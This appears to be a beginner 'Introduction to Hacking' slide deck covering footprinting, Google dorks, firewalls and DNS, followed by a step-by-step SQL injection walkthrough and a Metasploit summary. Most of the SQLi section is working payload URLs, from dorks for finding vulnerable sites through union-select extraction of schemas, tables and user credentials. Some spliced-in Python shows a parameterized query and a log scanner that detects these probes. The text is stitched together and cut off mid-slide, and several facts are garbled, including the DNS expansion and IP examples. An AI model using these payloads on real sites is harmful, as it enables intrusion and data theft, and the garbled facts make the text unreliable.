Introduction to Hacking
Hacking is the art of manipulating things such that they work in a way they weren’t supposed to.
So, the term ‘Hacking’ is not confined to the world of computers.
EX : Opening the car window using a ruler

Who am I ?
A hacker is a person who loves to explore technology and takes it to the next level.
According to some stereotypes, hacking today refers to breaking into a computer system without authorization, which is a criminal offense as per law.
A person who uses their hacking skills for malicious purposes is called a cracker.

Types of Hacker
White Hat | Grey Hat | Black Hat

Technical Level of Hackers
• Neophyte – A newbie in the field of computer security with almost no knowledge.
• Script Kiddie – A non-expert who breaks into systems using tools or scripts made by other hackers, with little knowledge of the concept working behind the tool.
• Elite – Also known as 1337, it is a term used to describe the most technically advanced hackers, who use cutting-edge technology.

IS HACKING LEGAL?
Yes, hacking is legal if you are authorized for the same, i.e. hired to find vulnerabilities.
This is the job of an ETHICAL HACKER.
An ethical hacker is a person who uses their hacking skills to find security loopholes or vulnerabilities in the TARGET system they were hired to test and reports the flaws to the administrator of the company.

Security Triangle
Defines the balance between security, functionality and ease of use.
As security increases, the system’s functionality and ease of use decrease.

STEPS OF ETHICAL HACKING
1. Information gathering
2. Scanning
3. Gaining Access
4. Generating Report
5. Report vulnerability

Footprinting
• Process of creating a blueprint or map of an organization’s network and systems.
• Or it is a technique of gathering information from various sources.
• Generally, a hacker spends 90 percent of the time profiling and gathering information on a target and 10 percent of the time launching the attack.

Sources of Information
• Media – TV, News etc.
• Social Network – Facebook, Twitter, Google+
• Search Engine – Google, Yahoo, Bing
• People Search – Yahoo! People, 123people.com etc.
• Domain name Lookups – Whois, SamSpade, Nslookup, Domain name lookup, DnsStuff
• Network Range – ARIN, IANA
• Geographic Map – Traceroute, NeoTrace, VisualRoute
• “Every single bit of information can be useful”

Sources of Information
Online Lookups
• Whois, ARIN, Centralops, SamSpade
• DNSstuff, Visual Trace, NeoTrace
Social Network + People Search
• Facebook, Google+, Twitter
• Yahoo! People, 123people
Search Engines, News Groups
• Google news, iGoogle
• Google, Yahoo, Bing, Ask

What is a firewall?
Firewalls are software programs or hardware devices that work as a filter between your computer (or network) and the internet, depending upon a set of rules.
It is similar to a security guard at the entrance who prevents intruders from entering the house and also prevents convicts from escaping.
Firewalls are of two types:
1. Software firewalls
2. Hardware firewalls

Software firewalls
• Used by individual home users.
• Installed on your computer as application software.
• Runs in the background and monitors the network activity.
• Ex: Windows Firewall, BlackICE Defender, Kaspersky Internet Security, AVG Internet Security etc.

Hardware firewall
• It is a device that guards the entrance to a network, not an individual computer.
• Basically, it is installed between your broadband cable or DSL modem and your computers.
• Provides a higher level of security than software firewalls.

What is DNS?
• DNS stands for Domain Name Server.
• It was difficult to remember the IP address of each website, so DNS came into action.
• It maintains a table in its database that maps domain names to IP addresses.
• Used for translating domain names into their respective IP addresses.
• Ex : facebook.com = 18.104.22.168
• Stores frequently used domains in its cache.
• Ex : Google’s open DNS server : 22.214.171.124

Google Hacking
Founders of Google: Sergey Brin and Larry Page
“Google Hacking” doesn’t mean “How to hack Google?”.
It is the skill of extracting valuable information from the web with the help of special keywords called “GOOGLE DORKS”.
The main idea is to “Pick a vulnerability, find the site”.

How Google works?
• Google Bots : Bots are computer programs that automatically browse the world wide web in some order. These are also called web crawlers, spiders, ants or robots. Google uses mainly two bots :
  - Crawlers : A crawler traverses the web following the links found on different pages. When it finds a new page, it sends the link to the spider.
  - Spiders : A spider is a robotic, browser-like program that downloads the web pages associated with the links sent by crawlers.
• Indexer : It dissects and sorts each word, image etc. on every web page downloaded by spiders.
• The Database is a warehouse for storing the pages downloaded and processed.
• Search Engine Results : Depending upon the search keywords, it digs search results out of the database following an algorithm.

Google : Server side
Google bots
Crawler finds new pages via
• URL submission at http://google.com/addurl.html
• Following different links present on each webpage.
Spiders download these webpages on Google servers

Basics of Google Hacking
• + : Forces the word to be searched. +firefox will bring up results that contain the word firefox.
• - : Eliminates the word from search results. -chrome will bring up results that don’t contain the word chrome.
• “ ” : Delimiters for entire search phrases (not single words). “Internet Explorer” will return documents containing the phrase Internet Explorer.
• . : Single letter wildcard. Krazzy.hack will search for words like krazzy@hack, krazzy2hack, krazzy-hack, krazzy_hack etc.
• * : Single word wildcard. hack * planet will search for words like hack the planet, hack for planet, hack all planet etc.
• | : Logical OR. firefox|chrome will return documents containing either firefox or chrome but not both.

Google query : keywords - I
• site : Restricts the search to the specified domain. site:xyz.com will show all pages on xyz.com crawled by Google bots.
• intitle : Restricts results to documents whose title contains the specified word. intitle:fox fire will find all sites with the word fox in the title and fire in the text.
• allintitle : Restricts results to documents whose title contains all the specified phrases. allintitle:fox fire will find all sites with the words fox and fire in the title, so it’s equivalent to intitle:fox intitle:fire.
• inurl : Restricts the results to sites whose URL contains the specified word. inurl:hacker will find sites whose URL contains the word hacker.
• allinurl : Restricts results to sites whose URL contains all the specified phrases. allinurl:hacker vs cracker will find the sites whose URL contains hacker vs cracker.
• filetype : Filters the search to the specified file types. filetype:pdf Google hacking will show all the PDF documents containing the words Google hacking.

Google query : keywords - II
• link : Restricts results to sites containing links to the specified location. link:www.google.com will return documents containing one or more links to www.google.com.
• inanchor : Restricts results to sites containing anchored text with the specified word. inanchor: backtrack will return documents that have fire as anchored text (not URL).
• allintext : Restricts results to documents containing the specified phrase in the text only. allintext:“Kevin Mitnick” will return documents which contain the phrase Kevin Mitnick in their text only.
• numrange : Restricts results to documents containing a number from the specified range. numrange:1-100 fire will return sites containing a number from 1 to 100 and the word fire. The same result can be achieved with 1..100 fire.
• cache : Shows the cached version of a URL. cache:xyz.com will show how the site looked the last time Google bots visited it.

Advanced Google Dorks
• Inurl:view/index.shtml
• Inurl:view/view.shtml

System Hacking
• Where windows installs password
• Reset windows logon password
• Play with sticky keys
• OPHCRACK
• Make a folder System Hidden
• Enable/Disable USB devices
• Make Drives invisible
• Make a undeletable folder
• Trojans

SQL Injection
• What is a Database?
  - Collection of logically related data
  - It is similar to an attendance register
• Define Table ?
  - It is a combination of rows and columns
• What is SQL ?
  - SQL stands for Structured Query Language.
  - Used to select information from a database

Basic SQL queries
Create a table
• Create table users(name varchar2(30), email varchar(50), password varchar(30), address varchar2(100));
Extracting data from table
• Select name, email, password from users;
• Select * from users where email='email@example.com' AND password='s3cr3t';
• Select * from users order by name;

Basics of SQL Injection
• How to find a site that is vulnerable to SQL injection attack?
  - Use Google dorks
    - Inurl:view_faculty.php?id=
    - Inurl:viz.php?id=
    - Inurl:list.php?id=
  - Use a vulnerability scanner
    - Acunetix
    - W3af

What happens in background??
• Check if site is vulnerable or not?
  - Ex : http://xyz.com/list.php?id=3
    Select name, email, password from users where id =3;
  - Ex : http://xyz.com/list.php?id=3'
    Select name, email, password from users where id =3';
THIS WILL GIVE AN ERROR MESSAGE, MEANS WE CAN DIRECTLY COMMUNICATE WITH DATABASE !!

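The query behaviour described on this slide, as an added example that is not from the original slides: a lookup that pastes the id parameter into the SQL text, next to one that validates and binds it. The table contents, function names and the use of Python's sqlite3 in place of MySQL are assumptions for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for the page's MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (3, "alice", "alice@example.com", "s3cr3t"),
        (4, "bob", "bob@example.com", "hunter2"),
    ])
    return db

def lookup_vulnerable(db, raw_id):
    # What the slide describes: the id parameter becomes part of the SQL text,
    # so a stray quote or an appended clause changes the statement itself.
    sql = "SELECT name, email, password FROM users WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_safe(db, raw_id):
    # Reject anything that is not a short run of ASCII digits (a real handler
    # would answer HTTP 400), then pass the value as a bound parameter so it
    # can never be parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    sql = "SELECT name, email, password FROM users WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def outcome(fn, db, raw_id):
    # Summarise a call as the page visitor would see it: rows or a DB error.
    try:
        return ("rows", len(fn(db, raw_id)))
    except sqlite3.Error as exc:
        return ("sql-error", type(exc).__name__)

if __name__ == "__main__":
    db = make_db()
    for value in ["3", "3'", "3 order by 100"]:
        print(repr(value),
              "vulnerable:", outcome(lookup_vulnerable, db, value),
              "safe:", outcome(lookup_safe, db, value))
```

The database error that the slide treats as the sign of a vulnerable page only appears with the concatenating lookup; the bound version returns no rows for the same inputs.
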
So WHAT’s NEXT???
• We will try to find the number of columns in the table
http://xyz.com/list.php?id=3+order+by+1--
• Select name, email, password from users where id =3 order by 1--
  - It will extract name, email, password from the users table and sort the contents by the 1st column; so it will give you the fresh original webpage.
• Select name, email, password from users where id =3 order by 100--
  - It will extract name, email, password from the users table and sort the contents by the 100th column; there isn’t any 100th column, so it will give you an error.

Finding columns
• So, we will increment the ‘order by’ value by 1 until we get an error
http://xyz.com/list.php?id=3+order+by+1--
http://xyz.com/list.php?id=3+order+by+2--
http://xyz.com/list.php?id=3+order+by+3--
:
:
http://xyz.com/list.php?id=3+order+by+7--
The above query returns an error, which means there are 6 columns in the current table.

Find the Vulnerable column
• We select all the columns, i.e. from 1-6
http://xyz.com/list.php?id=3+union+all+select+1,2,3,4,5,6--
• Try to find the vulnerable column that will return data
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--
IT WILL RETURN THE NOS OF VULNERABLE COLUMN i.e 1,2,3,4,5 or 6.

SQLi cont..
• Suppose it returns 2 and 6
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--
• Then we can fetch any information in the database at these column nos
http://xyz.com/list.php?id=-3+union+all+select+1,@@version,3,4,5,database()--
This will return the version of the database and the name of the database.
SYSTEM VARIABLES
@@version : Returns version of database
@@user : Returns the user currently logged in
@@database : Returns the name of database

Information Schema
• Most websites use MySQL databases for storing their information.
• MySQL has an ‘INFORMATION_SCHEMA’ database which keeps a record of all the schemas, tables and columns in the server.
• INFORMATION_SCHEMA.SCHEMATA stores schema details.
• INFORMATION_SCHEMA.TABLES stores all the information regarding tables in the database.
• INFORMATION_SCHEMA.COLUMNS stores information on all the columns in all the tables.

SQLi Cont…
• The query below will extract all the databases in the current server.
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_concat(schema_name) from information_schema.schemata--
• The code below will extract all the tables in the current db
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_concat(table_name) from information_schema.tables--

SQLi Cont…
• Extract all the columns from the current table
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_name='users'--
• Extract all the

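A defender's view of the request sequence walked through on the SQLi slides, as an added example that is not part of the original deck: it scans web access-log lines for the quote probe, the order-by column count, the union select and the schema lookups, and reports clients that show several of these stages. The log lines, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probing stages from the slides, in the order the slides walk through them.
STAGES = [
    ("quote-probe", re.compile(r"[?&][^=&\s]+=[^&\s]*'")),
    ("column-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"information_schema|@@version|database\(\)", re.I)),
]
# Combined-log-format prefix: client address, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

# Constructed sample log; addresses are documentation ranges (RFC 5737).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2024:13:55:01 +0000] "GET /list.php?id=3 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2024:13:55:04 +0000] "GET /list.php?id=3%27 HTTP/1.1" 500 312
203.0.113.7 - - [10/Oct/2024:13:55:09 +0000] "GET /list.php?id=3+order+by+1-- HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2024:13:55:15 +0000] "GET /list.php?id=3+order+by+7-- HTTP/1.1" 500 312
203.0.113.7 - - [10/Oct/2024:13:55:21 +0000] "GET /list.php?id=-3+union+all+select+1,2,3,4,5,6-- HTTP/1.1" 200 4980
203.0.113.7 - - [10/Oct/2024:13:55:30 +0000] "GET /list.php?id=-3+union+all+select+1,@@version,3,4,5,database()-- HTTP/1.1" 200 4991
198.51.100.20 - - [10/Oct/2024:13:56:02 +0000] "GET /search.php?q=o%27brien HTTP/1.1" 200 2210
198.51.100.20 - - [10/Oct/2024:13:56:40 +0000] "GET /search.php?q=order+by+mail HTTP/1.1" 200 2304
""".splitlines()

def classify(url):
    """Return the names of the probing stages a request URL matches."""
    decoded = unquote_plus(url)  # '+' and %xx become the characters the DB sees
    return [name for name, rx in STAGES if rx.search(decoded)]

def scan(lines, min_stages=2):
    """Map client -> stages seen, for clients that hit several distinct stages."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, url, _status = m.groups()
        seen[client].update(classify(url))
    order = [name for name, _ in STAGES]
    return {c: [s for s in order if s in st]
            for c, st in seen.items() if len(st) >= min_stages}

if __name__ == "__main__":
    for client, stages in scan(SAMPLE_LOG).items():
        print(client, "->", ", ".join(stages))
```

Requiring at least two distinct stages keeps a single apostrophe in a search term (the second client) from raising an alert.
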
Metasploit Framework
• It is a framework to exploit the services found during the Scanning Phase.
• You can create virus-infected files using this framework within a couple of minutes.
• After breaking into the system, you can set a backdoor, download files, upload files, disable the mouse, disable the keyboard… and lots more.
• We have provided a detailed full-length HD video tutorial in the DVD and an ebook.